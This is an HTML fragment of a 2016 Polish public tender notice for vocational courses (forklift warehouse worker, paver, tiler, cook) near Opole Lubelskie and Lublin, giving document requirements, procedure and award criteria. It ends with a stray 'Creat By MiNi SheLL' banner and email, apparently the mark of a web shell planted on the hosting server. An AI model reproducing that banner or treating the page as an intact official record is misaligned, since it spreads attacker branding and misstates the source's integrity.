              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu określonych przez Zamawiającego.
Potwierdzenie wpisu Wykonawcy do Rejestru Instytucji Szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej.
Wykaz wykonanych szkoleń, o których mowa w Rozdziale 5, ust. 5.2, pkt 5.2.2, ppkt 5.2.2.a SIWZ.
Wykaz osób które będą uczestniczyć w wykonaniu przedmiotowego zamówienia, o których mowa w Rozdziale 5, ust. 5.2, pkt 5.2.2, ppkt 5.2.2b SIWZ.
Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia zgodnie z opisem zawartym w Rozdziale 5, ust. 5.2, pkt 5.2.3  SIWZ. <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Informację dotyczącą zaangażowania Wykonawcy w pozyskiwanie miejsc dla przeszkolonych osób (należy opisać, a po zakończeniu szkolenia udokumentować)
W przypadku standardów kwalifikacji zawodowych należy podać kod zawodu, z opisu którego wykorzystano informacje, natomiast w przypadku korzystania z modułowych programów szkoleń zawodowych należy podać kod jednostki  modułowej</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wzory dokumentów potwierdzających ukończenie kursu i uzyskanie kwalifikacji przez uczestników szkolenia.
Dla Części I - Dokument potwierdzający, że program szkolenia został zatwierdzony przez uprawnioną jednostkę nadzorującą, tj. Urząd Dozoru Technicznego, Transportowy Dozór Techniczny lub inną uprawnioną do zatwierdzenia programu szkolenia w części dotyczącej obsługi wózków jezdniowych</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>45</td></tr><tr><td>doświadczeie w realizacji skoleń</td><td>50</td></tr><tr><td>certyfikat jakości</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />-	miejsca szkolenia  pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy (sytuacje losowe, wystąpienie siły wyższej) oraz pod warunkiem, że nie zmieni się miejscowość wykonania zamówienia a warunki lokalowe zaproponowane przez Wykonawcę będą nie gorsze do warunków wskazanych w ofercie;
-	terminu wykonania  pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy (sytuacje losowe, wystąpienie siły wyższej, niemożności skompletowania przez Zamawiającego z przyczyn niezależnych określonej liczby uczestników szkolenia) oraz pod warunkiem, że zostanie zachowany przeciętny tygodniowy wymiar 25 godzin zegarowych szkolenia;
-	osób prowadzących szkolenie  pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Wykonawcy (sytuacje losowe, wystąpienia niezawinionej utraty uprawnień przez te osoby) oraz pod warunkiem, że osoba wskazana przez Wykonawcę będzie posiadała doświadczenie i kwalifikacje nie mniejsze niż doświadczenie i kwalifikacje osoby wymienionej w ofercie i SIWZ;
-	liczby uczestników  pod warunkiem, że zmiana ta jest konieczna z przyczyn niezależnych od Zamawiającego (w sytuacjach losowych, wystąpienia siły wyższej, podjęcia zatrudnienia lub innej pracy zarobkowej przez uczestników szkolenia w trakcie szkolenia i nie kontynuowania przez nich tego szkolenia, nieusprawiedliwione przerwanie szkolenia, niemożności skompletowania grupy szkoleniowej z przyczyn niezależnych od Zamawiającego);
-	materiałów szkoleniowych przekazywanych nieodpłatnie uczestnikom  pod warunkiem, że zmiana jest konieczna z przyczyn niezależnych od Wykonawcy (sytuacje losowe, wystąpienie siły wyższej, w przypadku braku w księgarni określonych egzemplarzy książek) oraz pod warunkiem, że nowe materiały przedłożone przez Wykonawcę nie będą gorsze pod względem jakości i treści merytorycznych od materiałów przedstawionych w ofercie a ich cena nie ulegnie zmianie<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 07/10/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Magazynier z obsługą wózków jezdniowych z napędem silnikowym<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Liczba godzin: co najmniej 100 godzin zegarowych (133 godziny edukacyjne) łącznie z egzaminem państwowym w części dotyczącej obsługi wózków jezdniowych z napędem silnikowym (3 godziny zegarowe) przed komisją Urzędu Dozoru Technicznego. Za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut. Istnieje możliwość kumulowania przerw.
2) Liczba osób: 6 osób.
3) Liczba grup kursowych: jedna grupa. 
4) Celem szkolenia jest nabycie przez uczestników wiedzy teoretycznej i praktycznej, niezbędnej do pracy na stanowisku magazyniera, nabycie uprawnień do kierowania i obsługi wózków jezdniowych z napędem silnikowym oraz bezpiecznej wymiany butli gazowych w tych wózkach.
5) Termin realizacji szkolenia: październik-listopad 2016r. 
6) Liczba dni szkolenia -  maksymalnie 25 dni.
7) Miejsce realizacji usługi  dopuszcza się wykonanie usługi w następujący sposób:
1/ Zajęcia teoretyczne i praktyczne Lublin,
lub
2/ Zajęcia teoretyczne - na terenie województwa lubelskiego w następujących miejscowościach: Opole Lubelskie lub Poniatowa, a zajęcia praktyczne w Lublinie.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 25<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>45</td></tr><tr><td>Doswiadczenie w ealizacji szkoleń</td><td>50</td></tr><tr><td>cetyfikat jakości usłg</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Brukarz z egzaminem czeladniczym  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	Liczba godzin: co najmniej 201 godzin zegarowych (268 godzin edukacyjnych) łącznie z egzaminem. Za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut. Istnieje możliwość kumulowania przerw.
2) Liczba osób: 10 osób.
3) Liczba grup kursowych: jedna grupa. 
4) Celem szkolenia jest zdobycie kwalifikacji zawodowych do wykonywania pracy w zawodzie brukarz oraz przygotowanie uczestników szkolenia do przystąpienia do egzaminu czeladniczego w zawodzie brukarz.
5) Termin realizacji szkolenia:  październik-listopad 2016r. 
6) Liczba dni szkolenia -  maksymalnie 35 dni.
7) Miejsce realizacji usługi  dopuszcza się wykonanie usługi w następujący sposób:
a/ zajęcia teoretyczne- na terenie powiatu opolskiego w następujących miejscowościach: Opole Lubelskie lub Poniatowa,
b) zajęcia praktyczne - na terenie powiatu opolskiego w gminach: Opole Lubelskie lub Poniatowa. W przypadku problemów ze znalezieniem miejsca praktyk na terenie powiatu opolskiego Zamawiający dopuszcza realizację praktyk na terenie Lublina i w przypadku problemów z dotarciem do miejsca tych praktyk na terenie Lublina  Wykonawca zapewnia transport. Uczestnicy dojadą z miejsca zamieszkania do Lublina we własnym zakresie
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 35<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>45</td></tr><tr><td>Doświadczenie w realizacji szkoleń</td><td>50</td></tr><tr><td>Certyfikat jakości</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Glazurnik z egzaminem czeladniczym <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1) Liczba godzin co najmniej 201 godzin zegarowych (268 godzin edukacyjnych) łącznie z egzaminem. Za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut. Istnieje możliwość kumulowania przerw.
 2) Liczba osób: 10 osób.
3) Liczba grup kursowych: jedna grupa. 
4) Celem szkolenia jest zdobycie kwalifikacji zawodowych do wykonywania pracy w zawodzie glazurnik oraz przygotowanie uczestników szkolenia do przystąpienia do egzaminu czeladniczego w zawodzie glazurnik.
5) Termin realizacji szkolenia: październik   listopad  2016r. 
6) Liczba dni szkolenia -  maksymalnie 35 dni.
7) Miejsce realizacji usługi dopuszcza się wykonanie usługi w następujący sposób:
a/ zajęcia teoretyczne- na terenie powiatu opolskiego w następujących miejscowościach: Opole Lubelskie lub Poniatowa,
b) zajęcia praktyczne  miejsce i zakres prac wskaże Zamawiający na terenie powiatu opolskiego w gminach: Opole Lubelskie i  Poniatowa. 
Przed złożeniem ofert Wykonawca zobowiązany jest do oględzin miejsca odbywania zajęć praktycznych w celu oszacowania kosztów<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 35<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>45</td></tr><tr><td>Doświadczenie w realizacji szkoleń</td><td>50</td></tr><tr><td>Certyfikat jakości</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Kucharz z egzaminem czeladniczym <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1) Liczba godzin: co najmniej 160 godzin zegarowych i 30 minut (214 godzin edukacyjnych) łącznie z egzaminem. Za godzinę zegarową uznaje się zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut. Istnieje możliwość kumulowania przerw.
2) Liczba osób: 6 osób.
3) Liczba grup kursowych: jedna grupa. 
4) Celem szkolenia jest nabycie wiedzy oraz umiejętność praktycznych z zakresu technologii kulinarnej, organizacja, prowadzenie punktu gastronomicznego, obsługa konsumenta/klienta, obsługa kas fiskalnych oraz przygotowanie uczestników szkolenia do przystąpienia do egzaminu czeladniczego w zawodzie kucharz.
5) Termin realizacji szkolenia:  październik listopad 2016r. 
6) Liczba dni szkolenia -  maksymalnie 30 dni.
7) Miejsce realizacji usługi  dopuszcza się wykonanie usługi w następujący sposób:
a/ zajęcia teoretyczne- na terenie powiatu opolskiego w następujących miejscowościach: Opole Lubelskie lub Poniatowa,
b) zajęcia praktyczne - na terenie powiatu opolskiego w gminach: Opole Lubelskie lub Poniatowa. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>45</td></tr><tr><td>Doświadczenie w realizacji szkoleń</td><td>50</td></tr><tr><td>Certyfikat jakości usług</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com